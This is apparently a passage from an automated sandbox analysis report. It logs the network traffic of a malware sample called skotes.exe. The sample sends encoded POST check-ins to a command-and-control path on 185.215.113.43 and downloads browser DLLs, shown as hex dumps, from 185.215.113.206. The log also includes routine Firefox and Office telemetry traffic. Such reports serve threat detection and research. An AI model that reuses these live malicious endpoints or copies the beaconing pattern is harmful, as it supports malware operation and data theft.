                                                                                                                                                                                                                                              Nov 2, 2024 07:16:55.282497883 CET1236INData Raw: 55 e4 8b 04 02 89 45 d4 8b 45 e8 8b 55 ec 8d 44 02 01 89 d3 0f b6 c0 8b 7d f0 0f b6 14 07 00 d1 0f b6 f1 8a 34 37 88 34 07 88 14 37 00 d6 0f b6 c6 0f b6 04 07 89 45 e0 8b 45 e8 8d 44 03 02 89 de 0f b6 c0 0f b6 14 07 00 d1 0f b6 d9 8b 7d f0 8a 34
                                                                                                                                                                                                                                              Data Ascii: UEEUD}4747EED}4}4EUEUu}<7}<U2u4EUU}4}4E]Uu3EU
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:58.571621895 CET94OUTGET /746f34465cf17784/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:58.861891031 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:58 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                              ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Content-Length: 608080
                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:00.553237915 CET95OUTGET /746f34465cf17784/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:00.843926907 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:17:00 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                              ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Content-Length: 450024
                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              18192.168.2.464039185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:48.633091927 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:49.571072102 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:49 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              19192.168.2.464040185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:51.200560093 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:52.141247034 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:52 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              20192.168.2.46404134.107.221.82806864C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:52.494111061 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                              Host: detectportal.firefox.com
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:53.119369030 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 04:52:48 GMT
                                                                                                                                                                                                                                              Age: 5045
                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                              Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                              Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                              Data Ascii: success
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:56.412277937 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                              Host: detectportal.firefox.com
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:56.542689085 CET215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 04:52:48 GMT
                                                                                                                                                                                                                                              Age: 5048
                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                              Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                              Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                              Data Ascii: success
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:06.558731079 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:16.589541912 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:26.691874981 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:36.795630932 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              21192.168.2.46404334.107.221.82806864C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:53.307487965 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                              Host: detectportal.firefox.com
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:53.931094885 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Content-Length: 90
                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 16:02:58 GMT
                                                                                                                                                                                                                                              Age: 51235
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                              Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                              Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:56.512025118 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                              Host: detectportal.firefox.com
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:56.642020941 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Content-Length: 90
                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                              Date: Fri, 01 Nov 2024 16:02:58 GMT
                                                                                                                                                                                                                                              Age: 51238
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                              Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                              Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:06.659079075 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:16.730237961 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:26.832547903 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:36.916153908 CET6OUTData Raw: 00
                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              22192.168.2.464046185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:53.673899889 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:54.633366108 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:54 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              23192.168.2.464047185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:56.249819994 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:57.207406998 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:57 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              24192.168.2.464048185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:58.727197886 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:59.674454927 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              25192.168.2.464049185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:01.292643070 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                              Nov 2, 2024 07:17:02.221527100 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:17:02 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Refresh: 0; url = Login.php
                                                                                                                                                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 1 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              0192.168.2.46371613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:54 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain
                                                                                                                                                                                                                                              Content-Length: 218853
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public
                                                                                                                                                                                                                                              Last-Modified: Fri, 01 Nov 2024 06:15:12 GMT
                                                                                                                                                                                                                                              ETag: "0x8DCFA3C8B31D3C9"
                                                                                                                                                                                                                                              x-ms-request-id: b82d4cd6-601e-00ab-7849-2c66f4000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061554Z-176bd8f9bc5bc7vmhC1DFWbxbs00000001z000000000e56w
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                              Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                              2024-11-02 06:15:54 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                              Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
